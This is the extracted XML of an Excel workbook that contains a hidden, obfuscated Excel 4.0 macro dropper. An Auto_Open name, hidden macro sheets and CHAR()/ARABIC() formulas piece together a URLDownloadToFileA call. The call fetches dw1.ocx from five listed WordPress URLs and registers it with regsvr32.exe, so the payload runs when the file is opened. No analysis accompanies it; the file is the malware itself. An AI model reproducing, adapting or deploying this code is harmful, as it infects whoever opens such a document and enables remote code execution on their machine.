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macrosheets/intlsheet1.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet2.xml" ContentType="application/vnd.ms-excel.macro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File\25f\CIR-ZV\CIR\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6ED2BBB8-23B3-4B90-935F-87F4F0D045DE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rr1" sheetId="2" state="hidden" r:id="rId1"/>
    <sheet name="Sheet" sheetId="16" r:id="rId2"/>
    <sheet name="Sbrr1" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="EFWFSFG" sheetId="8" state="hidden" r:id="rId4"/>
    <sheet name="Br1" sheetId="4" state="hidden" r:id="rId5"/>
    <sheet name="Br2" sheetId="5" state="hidden" r:id="rId6"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId7"/>
  </externalReferences>
  <definedNames>
    <definedName name="DDDDD1" localSheetId="1">#REF!</definedName>
    <definedName name="DDDDD1">#REF!</definedName>
    <definedName name="DDWD" localSheetId="1">#REF!</definedName>
    <definedName name="DDWD">EFWFSFG!$D$15</definedName>
    <definedName name="DDWD1" localSheetId="1">#REF!</definedName>
    <definedName name="DDWD1">EFWFSFG!$D$17</definedName>
    <definedName name="DDWD2" localSheetId="1">#REF!</definedName>
    <definedName name="DDWD2">EFWFSFG!$D$19</definedName>
    <definedName name="DDWD3" localSheetId="1">#REF!</definedName>
    <definedName name="DDWD3">EFWFSFG!$D$21</definedName>
    <definedName name="DDWD4" localSheetId="1">#REF!</definedName>
    <definedName name="DDWD4">EFWFSFG!$D$23</definedName>
    <definedName name="DDWD8">EFWFSFG!$D$13</definedName>
    <definedName name="KKLD8" localSheetId="1">#REF!</definedName>
    <definedName name="KKLD8">#REF!</definedName>
    <definedName name="_xlnm.Auto_Open">EFWFSFG!$D$1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4" i="3" l="1"/>
  <c r="R4" i="3"/>
  <c r="F5" i="3" l="1"/>
  <c r="H8" i="3"/>
  <c r="C15" i="3"/>
  <c r="B10" i="3"/>
  <c r="K37" i="2"/>
  <c r="Q36" i="2"/>
  <c r="E35" i="2"/>
  <c r="O33" i="2"/>
  <c r="I32" i="2"/>
  <c r="I26" i="2"/>
  <c r="G24" i="2"/>
  <c r="K23" i="2"/>
  <c r="P22" i="2"/>
  <c r="P20" i="2"/>
  <c r="P19" i="2"/>
  <c r="B18" i="2"/>
  <c r="P17" i="2"/>
  <c r="I17" i="2"/>
  <c r="D17" i="2"/>
  <c r="P15" i="2"/>
  <c r="G12" i="3"/>
  <c r="F15" i="2"/>
  <c r="B15" i="2"/>
  <c r="K14" i="2"/>
  <c r="G14" i="2"/>
  <c r="P13" i="2"/>
  <c r="H13" i="2"/>
  <c r="D13" i="2"/>
  <c r="A12" i="2"/>
  <c r="D3" i="3"/>
  <c r="P11" i="2"/>
  <c r="L11" i="2"/>
  <c r="J11" i="2"/>
  <c r="E11" i="2"/>
  <c r="F10" i="2"/>
  <c r="P9" i="2"/>
  <c r="J11" i="3"/>
  <c r="K9" i="2"/>
  <c r="H9" i="2"/>
  <c r="C9" i="2"/>
  <c r="P7" i="2"/>
  <c r="J3" i="3"/>
  <c r="M7" i="2"/>
  <c r="D7" i="2"/>
  <c r="J6" i="2"/>
  <c r="E6" i="2"/>
  <c r="P5" i="2"/>
  <c r="B5" i="2"/>
  <c r="N4" i="2"/>
  <c r="H4" i="2"/>
  <c r="F4" i="2"/>
  <c r="P3" i="2"/>
  <c r="I3" i="2"/>
  <c r="C3" i="2"/>
  <c r="L2" i="2"/>
  <c r="G2" i="2"/>
  <c r="E2" i="2"/>
  <c r="M6" i="3"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12" uniqueCount="12">
  <si>
    <t>\Windows\</t>
  </si>
  <si>
    <t>SysWow64\</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>regsvr32.exe</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>"http://nataliapereira.com/wp-admin/pE8xYY3x6p/","</t>
  </si>
  <si>
    <t>"http://annewelshsalon.com/wp-admin/2c9l2o1/cWWAzTVQ/","</t>
  </si>
  <si>
    <t>"http://hellocloudgurusgerald.com/wp-content/iXYx/","</t>
  </si>
  <si>
    <t>"https://ramijabali.com/licenses/0/","</t>
  </si>
  <si>
    <t>"https://africa-roadworks.com/lilo-bard/vk3GSY7/","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</si>
</sst>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D4D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xlMacrosheet" Target="macrosheets/sheet2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/calcChain" Target="calcChain.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet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15</xdr:col>
      <xdr:colOff>276225</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>9677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4EC4CA94-5C52-4041-9F2D-D5A8D376C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9420224" cy="2478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File/1mar/CIR-ZV/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frbuk1"/>
      <sheetName val="Sheet"/>
      <sheetName val="Lefasbor1"/>
      <sheetName val="EFALGV"/>
      <sheetName val="Je1"/>
      <sheetName val="J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macrosheets/intl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300-000000000000}">
  <dimension ref="D11"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="D5" sqref="D5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="5.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="2" width="5.42578125" customWidth="1"/>
    <col min="3" max="3" width="5.28515625" customWidth="1"/>
    <col min="4" max="4" width="36.140625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="11" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D11" t="b">
        <f>FORMULA()=FORMULA('Br1'!C15,'Br2'!B3)=FORMULA(Grrr1!P22&amp;Grrr1!H9&amp;Grrr1!L2&amp;Grrr1!B15&amp;Grrr1!B15&amp;Sbrr1!B10&amp;Sbrr1!D3&amp;Sbrr1!C15&amp;Sbrr1!F5&amp;'Br2'!B3&amp;Sbrr1!H8&amp;Sbrr1!G12&amp;Sbrr1!J3&amp;Sbrr1!F24&amp;Sbrr1!P14&amp;Sbrr1!M6,D15)=FORMULA(Grrr1!P22&amp;Grrr1!J11&amp;Grrr1!B18&amp;Grrr1!P11&amp;"DDWD"&amp;Sbrr1!J11&amp;Grrr1!H9&amp;Grrr1!L2&amp;Grrr1!B15&amp;Grrr1!B15&amp;Sbrr1!B10&amp;Sbrr1!D3&amp;Sbrr1!C15&amp;Sbrr1!F5&amp;'Br2'!B3&amp;Sbrr1!H8&amp;Sbrr1!G12&amp;Sbrr1!J3&amp;Sbrr1!G26&amp;Sbrr1!P14&amp;Sbrr1!M6&amp;Grrr1!P13,D17)=FORMULA(Grrr1!P22&amp;Grrr1!J11&amp;Grrr1!B18&amp;Grrr1!P11&amp;"DDWD1"&amp;Sbrr1!J11&amp;Grrr1!H9&amp;Grrr1!L2&amp;Grrr1!B15&amp;Grrr1!B15&amp;Sbrr1!B10&amp;Sbrr1!D3&amp;Sbrr1!C15&amp;Sbrr1!F5&amp;'Br2'!B3&amp;Sbrr1!H8&amp;Sbrr1!G12&amp;Sbrr1!J3&amp;Sbrr1!H28&amp;Sbrr1!P14&amp;Sbrr1!M6&amp;Grrr1!P13,D19)=FORMULA(Grrr1!P22&amp;Grrr1!J11&amp;Grrr1!B18&amp;Grrr1!P11&amp;"DDWD2"&amp;Sbrr1!J11&amp;Grrr1!H9&amp;Grrr1!L2&amp;Grrr1!B15&amp;Grrr1!B15&amp;Sbrr1!B10&amp;Sbrr1!D3&amp;Sbrr1!C15&amp;Sbrr1!F5&amp;'Br2'!B3&amp;Sbrr1!H8&amp;Sbrr1!G12&amp;Sbrr1!J3&amp;Sbrr1!I30&amp;Sbrr1!P14&amp;Sbrr1!M6&amp;Grrr1!P13,D21)=FORMULA(Grrr1!P22&amp;Grrr1!J11&amp;Grrr1!B18&amp;Grrr1!P11&amp;"DDWD3"&amp;Sbrr1!J11&amp;Grrr1!H9&amp;Grrr1!L2&amp;Grrr1!B15&amp;Grrr1!B15&amp;Sbrr1!B10&amp;Sbrr1!D3&amp;Sbrr1!C15&amp;Sbrr1!F5&amp;'Br2'!B3&amp;Sbrr1!H8&amp;Sbrr1!G12&amp;Sbrr1!J3&amp;Sbrr1!J32&amp;Sbrr1!P14&amp;Sbrr1!M6&amp;Grrr1!P13,D23)=FORMULA(Grrr1!P22&amp;Grrr1!J11&amp;Grrr1!B18&amp;Grrr1!P11&amp;"DDWD4"&amp;Sbrr1!J11&amp;Grrr1!H9&amp;Grrr1!B15&amp;Grrr1!I17&amp;Grrr1!I3&amp;Grrr1!H13&amp;Grrr1!P11&amp;Grrr1!K9&amp;Grrr1!P13&amp;Grrr1!P7&amp;Grrr1!P13,D25)=FORMULA(Grrr1!P22&amp;Grrr1!H13&amp;Grrr1!N4&amp;Grrr1!H13&amp;Grrr1!H9&amp;Grrr1!P11&amp;Grrr1!P15&amp;Grrr1!H9&amp;Grrr1!P20&amp;Sbrr1!T2&amp;Sbrr1!P7&amp;Sbrr1!N18&amp;Grrr1!P19&amp;Grrr1!P27&amp;Grrr1!M7&amp;Sbrr1!R4&amp;Grrr1!P15&amp;Grrr1!P13,D27)=FORMULA(Grrr1!P22&amp;Grrr1!G24&amp;Grrr1!H13&amp;Grrr1!I26&amp;Grrr1!E11&amp;Grrr1!G24&amp;Grrr1!K23&amp;Grrr1!P11&amp;Grrr1!P13,D36)</f>
        <v>1</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet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400-000000000000}">
  <dimension ref="C15"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="15" spans="3:3" x14ac:dyDescent="0.25">
      <c r="C15" t="str">
        <f>CHAR(Grrr1!K37)</f>
        <v>e</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3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500-000000000000}">
  <dimension ref="B3"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="F9" sqref="F9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="2:2" x14ac:dyDescent="0.25">
      <c r="B3" t="s">
        <v>4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37"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A3" sqref="A3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="2" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E2" t="str">
        <f>CHAR(113-2)</f>
        <v>o</v>
      </c>
      <c r="G2" t="str">
        <f>CHAR(111-6)</f>
        <v>i</v>
      </c>
      <c r="L2" t="str">
        <f>CHAR(71-6)</f>
        <v>A</v>
      </c>
    </row>
    <row r="3" spans="1:16" x14ac:dyDescent="0.25">
      <c r="C3" t="str">
        <f>CHAR(111+3)</f>
        <v>r</v>
      </c>
      <c r="I3" t="str">
        <f>CHAR(87-4)</f>
        <v>S</v>
      </c>
      <c r="P3" t="str">
        <f>CHAR(90+2)</f>
        <v>\</v>
      </c>
    </row>
    <row r="4" spans="1:16" x14ac:dyDescent="0.25">
      <c r="F4" t="str">
        <f>CHAR(100-18)</f>
        <v>R</v>
      </c>
      <c r="H4" t="str">
        <f>CHAR(110-9)</f>
        <v>e</v>
      </c>
      <c r="K4">
        <v>1</v>
      </c>
      <c r="N4" t="str">
        <f>CHAR(89-1)</f>
        <v>X</v>
      </c>
    </row>
    <row r="5" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B5" t="str">
        <f>CHAR(115+2)</f>
        <v>u</v>
      </c>
      <c r="P5" t="str">
        <f>CHAR(44+2)</f>
        <v>.</v>
      </c>
    </row>
    <row r="6" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E6" t="str">
        <f>CHAR(90-6)</f>
        <v>T</v>
      </c>
      <c r="J6" t="str">
        <f>CHAR(77-3)</f>
        <v>J</v>
      </c>
    </row>
    <row r="7" spans="1:16" x14ac:dyDescent="0.25">
      <c r="D7" t="str">
        <f>CHAR(107+3)</f>
        <v>n</v>
      </c>
      <c r="F7">
        <v>3</v>
      </c>
      <c r="M7" t="str">
        <f>CHAR(117-2)</f>
        <v>s</v>
      </c>
      <c r="P7" t="str">
        <f>CHAR(41+3)</f>
        <v>,</v>
      </c>
    </row>
    <row r="9" spans="1:16" x14ac:dyDescent="0.25">
      <c r="C9" t="str">
        <f>CHAR(110-2)</f>
        <v>l</v>
      </c>
      <c r="H9" t="str">
        <f>CHAR(70-3)</f>
        <v>C</v>
      </c>
      <c r="K9" t="str">
        <f>CHAR(55-7)</f>
        <v>0</v>
      </c>
      <c r="P9" t="str">
        <f>CHAR(55+5)</f>
        <v>&lt;</v>
      </c>
    </row>
    <row r="10" spans="1:16" x14ac:dyDescent="0.25">
      <c r="F10" t="str">
        <f>CHAR(123-4)</f>
        <v>w</v>
      </c>
    </row>
    <row r="11" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E11" t="str">
        <f>CHAR(80+5)</f>
        <v>U</v>
      </c>
      <c r="J11" t="str">
        <f>CHAR(80-7)</f>
        <v>I</v>
      </c>
      <c r="L11" t="str">
        <f>CHAR(100-1)</f>
        <v>c</v>
      </c>
      <c r="P11" t="str">
        <f>CHAR(35+5)</f>
        <v>(</v>
      </c>
    </row>
    <row r="12" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A12" t="str">
        <f>CHAR(107+2)</f>
        <v>m</v>
      </c>
    </row>
    <row r="13" spans="1:16" x14ac:dyDescent="0.25">
      <c r="D13" t="str">
        <f>CHAR(72-4)</f>
        <v>D</v>
      </c>
      <c r="H13" t="str">
        <f>CHAR(68+1)</f>
        <v>E</v>
      </c>
      <c r="N13">
        <v>2</v>
      </c>
      <c r="P13" t="str">
        <f>CHAR(36+5)</f>
        <v>)</v>
      </c>
    </row>
    <row r="14" spans="1:16" x14ac:dyDescent="0.25">
      <c r="G14" t="str">
        <f>CHAR(124-4)</f>
        <v>x</v>
      </c>
      <c r="K14" t="str">
        <f>CHAR(70-4)</f>
        <v>B</v>
      </c>
    </row>
    <row r="15" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B15" t="str">
        <f>CHAR(80-4)</f>
        <v>L</v>
      </c>
      <c r="F15" t="str">
        <f>CHAR(105-5)</f>
        <v>d</v>
      </c>
      <c r="P15" t="str">
        <f>CHAR(31+3)</f>
        <v>"</v>
      </c>
    </row>
    <row r="17" spans="2:16" x14ac:dyDescent="0.25">
      <c r="D17" t="str">
        <f>CHAR(102-5)</f>
        <v>a</v>
      </c>
      <c r="I17" t="str">
        <f>CHAR(78+1)</f>
        <v>O</v>
      </c>
      <c r="K17" t="s">
        <v>2</v>
      </c>
      <c r="P17" t="str">
        <f>CHAR(40-2)</f>
        <v>&amp;</v>
      </c>
    </row>
    <row r="18" spans="2:16" x14ac:dyDescent="0.25">
      <c r="B18" t="str">
        <f>CHAR(65+5)</f>
        <v>F</v>
      </c>
    </row>
    <row r="19" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P19" t="str">
        <f>CHAR(32)</f>
        <v xml:space="preserve"> </v>
      </c>
    </row>
    <row r="20" spans="2:16" x14ac:dyDescent="0.25">
      <c r="H20">
        <v>8</v>
      </c>
      <c r="P20" t="str">
        <f>CHAR(52+6)</f>
        <v>:</v>
      </c>
    </row>
    <row r="22" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P22" t="str">
        <f>CHAR(66-5)</f>
        <v>=</v>
      </c>
    </row>
    <row r="23" spans="2:16" x14ac:dyDescent="0.25">
      <c r="K23" t="str">
        <f>CHAR(80-2)</f>
        <v>N</v>
      </c>
    </row>
    <row r="24" spans="2:16" x14ac:dyDescent="0.25">
      <c r="G24" t="str">
        <f>CHAR(84-2)</f>
        <v>R</v>
      </c>
      <c r="P24" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="26" spans="2:16" x14ac:dyDescent="0.25">
      <c r="I26" t="str">
        <f>CHAR(84)</f>
        <v>T</v>
      </c>
    </row>
    <row r="27" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P27" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="32" spans="2:16" x14ac:dyDescent="0.25">
      <c r="I32">
        <f>_xlfn.ARABIC("CXI")</f>
        <v>111</v>
      </c>
    </row>
    <row r="33" spans="5:17" x14ac:dyDescent="0.25">
      <c r="O33">
        <f>_xlfn.ARABIC("LXVII")</f>
        <v>67</v>
      </c>
    </row>
    <row r="35" spans="5:17" x14ac:dyDescent="0.25">
      <c r="E35">
        <f>_xlfn.ARABIC("LXI")</f>
        <v>61</v>
      </c>
    </row>
    <row r="36" spans="5:17" x14ac:dyDescent="0.25">
      <c r="Q36">
        <f>_xlfn.ARABIC("CXIV")</f>
        <v>114</v>
      </c>
    </row>
    <row r="37" spans="5:17" x14ac:dyDescent="0.25">
      <c r="K37">
        <f>_xlfn.ARABIC("CI")</f>
        <v>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ADF30-C21B-4110-9C6E-966F97974966}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="V19" sqref="V19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" s="1" customFormat="1" ht="18.7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32"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:20" x14ac:dyDescent="0.25">
      <c r="T2" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="2:20" x14ac:dyDescent="0.25">
      <c r="D3" s="2" t="str">
        <f>T(Grrr1!C9&amp;Grrr1!A12&amp;Grrr1!E2&amp;Grrr1!D7&amp;Grrr1!P15&amp;Grrr1!P7&amp;Grrr1!P15&amp;Grrr1!E11&amp;Grrr1!F4&amp;Grrr1!B15&amp;Grrr1!D13)</f>
        <v>lmon","URLD</v>
      </c>
      <c r="J3" s="2" t="str">
        <f>T(Grrr1!P7&amp;Grrr1!K9&amp;Grrr1!P7)</f>
        <v>,0,</v>
      </c>
    </row>
    <row r="4" spans="2:20" x14ac:dyDescent="0.25">
      <c r="R4" s="2" t="str">
        <f>T(Grrr1!P19&amp;Grrr1!P5&amp;Grrr1!P5&amp;Grrr1!P3&amp;Grrr1!F15&amp;Grrr1!F10&amp;Grrr1!K4&amp;Grrr1!P5&amp;Grrr1!E2&amp;Grrr1!L11&amp;Grrr1!G14)</f>
        <v xml:space="preserve"> ..\dw1.ocx</v>
      </c>
    </row>
    <row r="5" spans="2:20" x14ac:dyDescent="0.25">
      <c r="F5" s="2" t="str">
        <f>T(Grrr1!B18&amp;Grrr1!G2&amp;Grrr1!C9)</f>
        <v>Fil</v>
      </c>
    </row>
    <row r="6" spans="2:20" x14ac:dyDescent="0.25">
      <c r="M6" s="2" t="str">
        <f>T(Grrr1!P7&amp;Grrr1!K9&amp;Grrr1!P7&amp;Grrr1!K9&amp;Grrr1!P13)</f>
        <v>,0,0)</v>
      </c>
    </row>
    <row r="7" spans="2:20" x14ac:dyDescent="0.25">
      <c r="P7" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="2:20" x14ac:dyDescent="0.25">
      <c r="H8" s="2" t="str">
        <f>T(Grrr1!L2&amp;Grrr1!P15&amp;Grrr1!P7&amp;Grrr1!P15&amp;Grrr1!J6&amp;Grrr1!J6&amp;Grrr1!H9&amp;Grrr1!H9)</f>
        <v>A","JJCC</v>
      </c>
    </row>
    <row r="10" spans="2:20" x14ac:dyDescent="0.25">
      <c r="B10" s="2" t="str">
        <f>T(Grrr1!P11&amp;Grrr1!P15&amp;Grrr1!B5&amp;Grrr1!C3)</f>
        <v>("ur</v>
      </c>
    </row>
    <row r="11" spans="2:20" x14ac:dyDescent="0.25">
      <c r="J11" s="2" t="str">
        <f>T(Grrr1!P9&amp;Grrr1!K9&amp;Grrr1!P7&amp;Grrr1!P19)</f>
        <v xml:space="preserve">&lt;0, </v>
      </c>
    </row>
    <row r="12" spans="2:20" x14ac:dyDescent="0.25">
      <c r="G12" s="2" t="str">
        <f>T(Grrr1!K14&amp;Grrr1!K14&amp;Grrr1!P15)</f>
        <v>BB"</v>
      </c>
    </row>
    <row r="14" spans="2:20" x14ac:dyDescent="0.25">
      <c r="P14" s="2" t="str">
        <f>T(Grrr1!P5&amp;Grrr1!P5&amp;Grrr1!P3&amp;Grrr1!F15&amp;Grrr1!F10&amp;Grrr1!K4&amp;Grrr1!P5&amp;Grrr1!E2&amp;Grrr1!L11&amp;Grrr1!G14&amp;Grrr1!P15)</f>
        <v>..\dw1.ocx"</v>
      </c>
    </row>
    <row r="15" spans="2:20" x14ac:dyDescent="0.25">
      <c r="C15" s="2" t="str">
        <f>T(Grrr1!E2&amp;Grrr1!F10&amp;Grrr1!D7&amp;Grrr1!C9&amp;Grrr1!E2&amp;Grrr1!D17&amp;Grrr1!F15&amp;Grrr1!E6&amp;Grrr1!E2)</f>
        <v>ownloadTo</v>
      </c>
    </row>
    <row r="18" spans="6:14" x14ac:dyDescent="0.25">
      <c r="N18" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="24" spans="6:14" x14ac:dyDescent="0.25">
      <c r="F24" s="2" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="26" spans="6:14" x14ac:dyDescent="0.25">
      <c r="G26" s="2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="28" spans="6:14" x14ac:dyDescent="0.25">
      <c r="H28" s="2" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="30" spans="6:14" x14ac:dyDescent="0.25">
      <c r="I30" s="2" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="32" spans="6:14" x14ac:dyDescent="0.25">
      <c r="J32" s="2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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="6" baseType="lpstr">
      <vt:lpstr>Grrr1</vt:lpstr>
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Sbrr1</vt:lpstr>
      <vt:lpstr>EFWFSFG</vt:lpstr>
      <vt:lpstr>Br1</vt:lpstr>
      <vt:lpstr>Br2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2022-03-01T20:57:45Z</dcterms:modified>
</cp:coreProperties>
</file>